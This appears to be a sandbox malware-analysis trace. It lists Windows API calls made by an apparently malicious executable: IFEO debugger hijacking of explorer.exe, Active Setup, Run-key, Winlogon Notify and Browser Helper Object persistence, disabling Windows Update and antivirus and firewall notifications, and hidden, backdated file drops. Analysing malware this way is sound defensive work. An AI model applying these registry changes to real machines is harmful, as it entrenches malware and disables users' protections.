                                                                                                                                                                                                              • CloseHandle.KERNEL32(007C7CF1,00001388), ref: 00404698
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 004046BC
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,00000080), ref: 004046C5
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00020019,?,?,?,?,?,?,?,?,qnd_b__-13), ref: 004046F4
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 0040472B
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,Default Flags,00000000,00000000,00412170,?,?,?,0040F4FC,?,00000000), ref: 00404766
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00404790
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000012,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 004047A1
                                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy), ref: 004047BA
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,0040F4FC,?,00000000), ref: 004047CC
                                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000,?,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 004047E2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,qnd_b__-13,?,?,?,?,qnd_b__-13), ref: 00404804
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000,?,?,?,qnd_b__-13), ref: 0040484E
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 0040487A
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,Extended Flags,00000000,00000000,004120C4,?,?,?,0040F4FC,?,00000000,?,?,?,qnd_b__-13), ref: 004048B1
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Extended Flags,00000000,00000003,004120C4,0000000C,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 004048D7
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,004120C4,?,?,?,0040F4FC,?,00000000,?,?,?,qnd_b__-13), ref: 004048E9
                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(%ComSpec%,?,00000104,?,?,?,?,?,?,?,004120C4,?,?,?,0040F4FC,?), ref: 00404906
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00404925
                                                                                                                                                                                                              • GetFileTime.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,004120C4,?), ref: 00404954
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,004120C4,?), ref: 00404963
                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000100), ref: 00404998
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00411030,?,00000100,?,?,00000104,?,?,?,?,?,?,?,004120C4,?), ref: 004049A9
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,007C7CF0,?,00411030,?,00000100,?,?,00000104), ref: 004049B0
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,%CommonProgramFiles%\System\,?,?,?,?,?,?,00000104), ref: 004049E6
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,007C7CF0,?,%CommonProgramFiles%\System\,?,?,?,?,?,?,00000104), ref: 004049ED
                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,?,%CommonProgramFiles%\System\,?,?,?,?,?,?,00000104), ref: 004049FC
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,%AppData%\,?,?,?,?,?,?,?,?,?,%CommonProgramFiles%\System\), ref: 00404A2B
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,007C7CF0,?,%AppData%\,?,?,?,?,?,?,?,?,?,%CommonProgramFiles%\System\), ref: 00404A32
                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,?,%AppData%\,?,?,?,?,?,?,?,?,?,%CommonProgramFiles%\System\), ref: 00404A48
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000,?,?,00000100,?,?,00000104), ref: 00404A8F
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000000F0,00000000,00000002,00000000,?,?,00000100,?,?,00000104), ref: 00404AA9
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,004120C0,00000004,?,00000000,?,?,00000002,00000000,?,?,00000100,?,?,00000104), ref: 00404AC3
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,004120C0,00000004,?,00000000,?,?,00000002,00000000,?,?,00000100,?,?,00000104), ref: 00404AC9
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000100,00000001,00000000,00000003,00000000,00000000,?,?,00000100,?,?,00000104), ref: 00404AF2
                                                                                                                                                                                                              • SetFileTime.KERNEL32(00000000,?,?,?,00000000,?,?,00000100,?,?,00000104), ref: 00404B1E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?,00000100,?,?,00000104), ref: 00404B27
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,00000100,?,?,00000104), ref: 00404B3C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000021,?,?,?,00000100,?,?,00000104), ref: 00404B48
                                                                                                                                                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00404B55
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00404B75
                                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000100,?,?,00000104), ref: 00404B7F
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000104), ref: 00404BA5
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000104,?,?,?,?,?,?,?,004120C4,?), ref: 00404BC3
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 00404BF8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 00404C04
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00001000,00401379,?,00000000,?), ref: 00404C3F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,00000104,?,?,?,?,?,?,?,004120C4,?), ref: 00404C48
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe,?), ref: 00404C95
                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00404CB5
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00411030,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404CC6
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,007C7CC8,?,00411030,?,00000104), ref: 00404CCD
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,{9703941E-446E-952F-954A-3DA8A91ED84F},?,?,00000104), ref: 00404CF3
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00002710,?,?,?,?,?,00000104), ref: 00404D0F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00002710,?,?,?,?,?,00000104), ref: 00404D1E
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,{9703941E-446E-952F-954A-3DA8A91ED84F},?,?,00000104), ref: 00404D48
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404D63
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00404E01
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E3B
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00404E74
                                                                                                                                                                                                              • SetFileTime.KERNEL32(?,?,?,?), ref: 00404EA9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00404EB8
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00404ED7
                                                                                                                                                                                                              • RegDeleteValueA.ADVAPI32(?,Debugger,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00404EEB
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00404F03
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Debugger,00000000,00000001,?,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 00404F1E
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00404FD2
                                                                                                                                                                                                              • Sleep.KERNEL32(000007D0,?,?,?,{10F5781A-0D97-0F99-EF77-BA382916E579},?,?,00411030), ref: 00405188
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 0040525A
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405291
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 004052CB
                                                                                                                                                                                                              • SetFileTime.KERNEL32(?,?,?,?), ref: 00405300
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040530F
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0040532E
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,IsInstalled,00000000,00000004,00000001,00000004,?,?,?,?,?,00000000,00000000), ref: 0040536A
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,00000004,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00405373
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,StubPath,00000000,00000001,?,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 0040538E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00000080,00000000), ref: 004053B2
                                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,?), ref: 004053C7
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,ShellRegEx), ref: 00405402
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?), ref: 00405445
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,?), ref: 00405464
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 00405480
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,00000080), ref: 00405489
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004054B0
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 004054CE
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004054ED
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040551E
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,0040F580,00000C00,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00404D9D
                                                                                                                                                                                                                • Part of subcall function 0040140F: wsprintfA.USER32 ref: 00401422
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00000080,00000000), ref: 00404F42
                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00404F72
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,QlC5hT0yHn63XEm5LqJ2OxSkGj2v,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404F98
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404FB5
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00404FDE
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00405088
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,SOFTWARE\Microsoft\Active Setup\Installed Components\), ref: 004050C3
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,{4D415259-4a4f-4e45-5334-4D4152594a4f},?,SOFTWARE\Microsoft\Active Setup\Installed Components\), ref: 004050CE
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 004050E4
                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040510D
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00411030), ref: 0040511E
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,007C7C50,?,00411030), ref: 00405125
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,{10F5781A-0D97-0F99-EF77-BA382916E579},?,?,00411030), ref: 0040514B
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00002710,?,?,?,?,?,00411030), ref: 00405167
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00002710,?,?,?,?,?,00411030), ref: 00405176
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,{10F5781A-0D97-0F99-EF77-BA382916E579},?,?,00411030), ref: 004051A0
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 004051BB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00410200,00000800,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 004051F5
                                                                                                                                                                                                              • RegDeleteValueA.ADVAPI32(00000000,ShellRegEx), ref: 004053F3
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?), ref: 004055C0
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?,?), ref: 004055D5
                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(%AppData%\,?,00000104,?,?,?), ref: 00405610
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,tmp,00000000,?,00000104,?,?,?), ref: 0040562C
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000104,?,?,?), ref: 0040564B
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,00000104,?,?,?), ref: 00405673
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,tmp,00000000,?,?,?,?,?,00000104,?,?,?), ref: 00405693
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,00000104,?,?,?), ref: 004056B6
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 004056EA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 004056F6
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000), ref: 00405715
                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405760
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00411030,?,00000104,?,?,?,?,?,?,00000104,?,?,?), ref: 00405771
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,007C7DE0,?,00411030,?,00000104,?,?,?,?,?,?,00000104,?,?,?), ref: 00405778
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,007C7DE0,?,00411030,?,00000104,?,?,?,?,?,?,00000104), ref: 00405783
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00411030,?,00000104), ref: 0040579E
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00407C80,00001400,?,00000000,?,?,?,?,?,?,00000080,00000000,?,00000104,?), ref: 004057DC
                                                                                                                                                                                                              • SetFileTime.KERNEL32(?,?,?,?), ref: 0040580A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00405819
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000080,00000000,00411030,?,00000104,?,?,?,?,?,?,00000104), ref: 0040586E
                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(%AppData%\,?,00000104,?,?,?,?,00000080,00000000,00411030,?,00000104), ref: 004058AC
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000104,?,?,?,?,00000080,00000000,00411030,?,00000104), ref: 004058BB
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,00000080,00000000,00411030,?,00000104), ref: 004058C6
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,00000104,?,?,?,?,00000080), ref: 004058E1
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000080,00000000,?,?,?,00000104,?,?,?,?,00000080,00000000,00411030), ref: 004058FD
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 0040591B
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405927
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405932
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000104,?,?,?,?,?,?,00000080), ref: 0040594D
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000080,00000000,?,00000104,?,?,?,?,?,?,00000080,00000000), ref: 00405969
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040599B
                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(%AppData%\,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 004059C0
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 004059CF
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000080), ref: 004059DA
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,00000104), ref: 004059F5
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00405A27
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00405A33
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405A50
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405A5C
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405A67
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000104,?,?,?,?,?,?,00000080), ref: 00405A82
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000,?,00000104,?), ref: 00405AB4
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000,?,00000104), ref: 00405AC0
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00006400,?,00000000), ref: 00405AF8
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?,?,?,?,?,?,?,00000080,00000000,?,00000104,?), ref: 00405B2E
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?), ref: 00405B4F
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,00020006,?,?,?,?,?,?,?,00000080,00000000), ref: 00405B79
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00000000,00000001,?,00000001,?,?,?,?,?,?,?,00020006,?), ref: 00405B95
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00020006,?,?,?,?,?,?,?,00000080,00000000), ref: 00405BA7
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU,?), ref: 00405BF2
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,NoAutoUpdate,00000000,00000004,?,00000004), ref: 00405C1B
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000004,?,?,?,?,?,?,?,?,?,?,?,00020006,?), ref: 00405C2A
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Security Center,00000000,00020006,?,?,?,?,?), ref: 00405C9C
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,AntiVirusOverride,00000000,00000004,?,00000004,?,?,?,?,?,?,?,?,?), ref: 00405CC5
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,AntiVirusDisableNotify,00000000,00000004,?,00000004,?,AntiVirusOverride,00000000,00000004,?,00000004), ref: 00405CDD
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,FirewallDisableNotify,00000000,00000004,?,00000004,?,AntiVirusDisableNotify,00000000,00000004,?,00000004,?,AntiVirusOverride,00000000,00000004), ref: 00405CF5
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,UpdatesDisableNotify,00000000,00000004,?,00000004,?,FirewallDisableNotify,00000000,00000004,?,00000004,?,AntiVirusDisableNotify,00000000,00000004), ref: 00405D0D
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000004,?,?,?,?,?,?,?,?,?), ref: 00405D1C
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,0002001F,?,?,?,?,?,00020006,?,?,?,?,?), ref: 00405D52
                                                                                                                                                                                                              • RegDeleteValueA.ADVAPI32(?,00000000,?,?,?,0002001F,?,?,?,?,?,00020006,?), ref: 00405DCE
                                                                                                                                                                                                              • RegEnumValueA.ADVAPI32(?,?,00000000,?,00000000,?,00004000,00004000), ref: 00405E0A
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00405E24
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000001,?,?,?,?,0002001F,?), ref: 00405E3B
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0002001F,?), ref: 00405E54
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00010000,00402818,00000002,00000000,?), ref: 00405E77
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00020006,?), ref: 00405E80
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000021), ref: 00405F00
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 00405F1D
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,IsInstalled,00000000,00000004,00000001,00000004), ref: 00405F5D
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,00000004), ref: 00405F66
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,StubPath,00000000,00000001,?,00000001), ref: 00405F81
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 00405F90
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,?,?,?,?,00000001), ref: 00405FAC
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe,?), ref: 00405FC6
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00405FE6
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Debugger,00000000,00000001,?,00000001), ref: 00406001
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 00406010
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?), ref: 00406039
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?), ref: 0040605A
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,00020006,?), ref: 00406071
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00000000,00000001,?,00000001,?,?,?,?,?,?,?,00020006,?), ref: 0040608D
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,?,?,?,?,00020006,?), ref: 0040609C
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 004060D6
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 00406102
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,ShellRegEx,00000000,00000003,?,0000022A,?,?,0040F4FC,?,00000000), ref: 0040612E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,0000022A,?,?,0040F4FC,?,00000000,?,?,?,?,?,?,?,?,00000001), ref: 0040613D
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00406152
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B},?), ref: 0040617C
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0040619C
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,DLLName,00000000,00000001,?,00000001), ref: 004061B7
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Startup,00000000,00000001,Startup,00000008,?,DLLName,00000000,00000001,?,00000001), ref: 004061D3
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 004061E2
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000000,CLSID\{F1ACE452-91D3-FF14-6B60-AD3718D5C8FC}\InProcServer32,?), ref: 00406204
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0040621B
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 00406233
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,ThreadingModel,00000000,00000001,Both,00000005,?,00000000,00000000,00000001,?,00000001), ref: 0040624F
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 0040625E
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F1ACE452-91D3-FF14-6B60-AD3718D5C8FC},?), ref: 00406271
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00406287
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,?,?,?,?,00000001), ref: 0040629C
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,00000021,?,?,?,?,?,?,?,00000001), ref: 004062A9
